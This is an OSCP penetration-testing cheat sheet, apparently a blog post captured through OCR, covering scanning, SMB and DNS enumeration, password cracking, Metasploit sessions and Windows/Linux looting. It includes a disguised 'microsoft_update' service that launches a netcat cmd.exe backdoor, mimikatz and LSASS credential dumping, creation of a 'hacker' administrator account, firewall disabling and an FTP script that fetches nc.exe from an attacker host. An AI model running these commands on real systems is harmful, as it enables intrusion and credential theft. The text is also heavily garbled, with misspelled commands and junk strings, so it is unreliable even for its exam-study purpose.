OSCP Cheat Sheet Here are some commands that I found helpful during the OSCP. | encourage you to take a look at the resource links that I've posted here to go in further detail in many of these topics. Pre Scanning Quick Pass map --top-ports 10 --vpen Intense scan nmap -p 1-65535 -T4 -A -v Webnitko -h dirb http:// /usr/share/wordlists/dirb/ finmap -u -/dotdotpun.pl -m -h [OPTIONS] wpscan -url http:/// ~enunerate p File Include Resource 1 (https://evitzone.org/tutorials/remote-file-inclusion%28rfi%29/) File Include Resource 2 (http://www-hackersonlineclub.com/Ifi-rfi) File Include Resource 3 (https://Oxzoidberg.wordpress.com/category/security/Ifi-rf/) SMB/RPC enumalinux a map --script=snb* -p epeclient -U"" -N showmount -e / mount -t cifs //<1P>/ -o username=" guest” password: net view \\ nbtscan -r smbclient -L \\ -U login nmblookup -A target repinesecnerateadccais che Peet asai SQL Injection Cheat Sheet (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet! nmap sv Pn sqlmap -u SMTP. map -script=smtp* -p SNMP snmpwalk -¢ publi snmpenun -t Onesixtyone - ¢ -I FTP nmap -script=ftp* -p ftp: //<1P> DNS repinesecnerateadccais che Peet Backdoor SQL Injection (http://resources infosecinstitute. cam/backdoor-sql-injection/)-/dnsrecon.py -d /dnsrecon.py -4 -t axfr /dnsrecon.py -d -D -t brt -/ansrecon.py -d -t zonewalk nmap script=dns-zone-transfer -p 53 ns2.megacorpone.com nmap -p- ~sV --reason --dns-server 1.2.3.4 Pass-the-Hash pth-winexe -U // ond During Password Cracking Discover type of hash that you have hash-identifier John the Ripper /etc/shadow cracking© Create a file with passwd © Create file with shadow ‘= Combine into one document unsnadow John —owordlist-cany word 14st> -P -v ssh Medusa Medusa -h -U PASS FILE> http -m DIR: /admin Hashcat hashcat -m 400-2 @ WORD LIST> TTY Shells See TTY Shells (http://thor-sec.com/cheatsheet/tty_spawnage/) section Metaplsoit Payloads See msfvenom cheat sheet (http://thor-sec.com/cheatsheet/msfvenom_cheat_sheet/) section repinesecnerateadccais che Peet ooMetasploit commands ETT getutd search F *passt.txt shell getprivs session -i 1 —puts you back into your session Turn a regular shell into a meterpreter shell+ Attacker © use expott/nutts handler © set payloas windous/sneLi/revese_tep © set tpoce cont> + Target + Attacker © Cirl+Z (to background session) © sessions 1 (this wl st your sessions to verify which one itis) © sete ehost © sete anost © _sesstons -u 1 (the 1is the session number) Netcat See Netcat cheat sheet (http://thor-sec.com/cheatsheet/netcat_cheatsheet/) section Useful Windows Commands repinesecnerateadccais che Peetnet view net user net localgroup Users net localgroup Administrators net user hacker password /add net localgroup adninistrators hacker /add search dir/s *.doc system(“start end.exe /k Send”) sc create microsoft_update binpath.”cnd /K start ¢:\nc.exe -d -e cnd.exe” starts auto error C:\ne.exe -e c:\windows\system32\cnd.exe -vv minikatz.exe “privilege: lebug” “log” “sekurls: -Logonpasswords” Procdump.exe -accepteula -ma Isass.exe Isass.dmp minikatz.exe “sekurlsa: :minidump Isass.dnp” “log” “‘sekurlsa::logonpasswords” (32-bit) (64-bit) reg add “hkln\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d a ‘temp\procdump.exe -accepteula -64 -ma Isass.exe Isass.dmp netsh firewall set service renoteadmin enable netsh firewall set service remotedesktop enable repinesecnerateadccais che Peet anetsh Firewall set opmode disable XSYSTEMDRIVEX\boot ini SWINDRIVEX\win. ind type XWINDRIVEX\Systen32\drivers\etc\hosts Useful Nix Commands SUID root files find / -user root -perm -4000 -print SGID root files: find / -group root -perm -2000 -print SUID & SGID files ownership find / -perm -4000 -o -perm -2000 -print Files not owned by anyone find / -nouser -print Files not owned by any group find / -nogroup -print ‘Symlinks and their pointers find / -type 1 -1s Download an EXE from FTP server echo open IP> C:\script.txt echo user myftpusers> C:\script.txt echo pass myftppass>> C:\script.txt echo get _nc.exe>> C:\script.txt echo bye>> C:\script.txt ftp -s:script.txt repimesecamrateaascais che PeetShells See resources (http://thor-sec.com/review/oscp_review/#resource) section Reverse Shell Cheat Sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) Post Windows loo’ ig (brief) systeninfo type boot int hostname ipconfig /all netstat -ano net users net localgroup route print arp “A netsh firewall show state netsh firewall show config repinesecnerateadccais che Peet woeschtasks /query /fo LIST /v schtasks /query /fo LIST /v net start accesschk.exe -ucqv “Authenticated Users" * dir network-secret.txt /s windump - 2 -w capture -n -U -s @ sre not and dst not Nix looting (brief) locate proof. txt/network-secret. txt find -name "proof. txt"/"network-secret txt” uname -a cat_/proc/version cat_/etc/passwd cat_/etc/shadow cat_/etc/group As -alk | grep “4 ifconfig -a netstat -ano cat_/etc/hosts repinesecnerateadccais che Peetarp tepdump <1 eth@ -w capture 5 0 sre not

and dst not <1P> tepdunp etho sre not and dst not _<1P> Packet Sniffing tcpdump -i tap@ host <1P> tcp port 8@ and not arp and not icmp -vww tcpdump -i ethe -w capture -n -U ~s @ src not and dst not tcpdump eth® sre not and dst not Other Quick Kali Configuration SSH = Start Stop service sh stop HTTP Service repinesecnerateadccais che PeetStart = Verify its running hetoi//327.0.0.4 = Directory Narivww! * Stop Update boot sequence update-re-d ssh enable update-rc.d apache2 enable ecconf (GUE) Compiling Exploits 32-bit gcc _-m32_-o output32 hell 64-bit gcc -o output hello.c Windows Comp!d_/root/.wine/drive_c/Mingw/bin wine gcc -o exploit.exe /tmp/exploit.c -Iwsock32 wine exploit.exe Tags: | OSCP (mipynrors gsitoxcp %& Categories: | Cheatsheet tp/thor seccom/categores/¥cheatshee #2) Updated: July 18, 207 LeAVEA COMMENT Your email address will not be published. Required fields are marked * Comment * Name * repinesecnerateadccais che Peet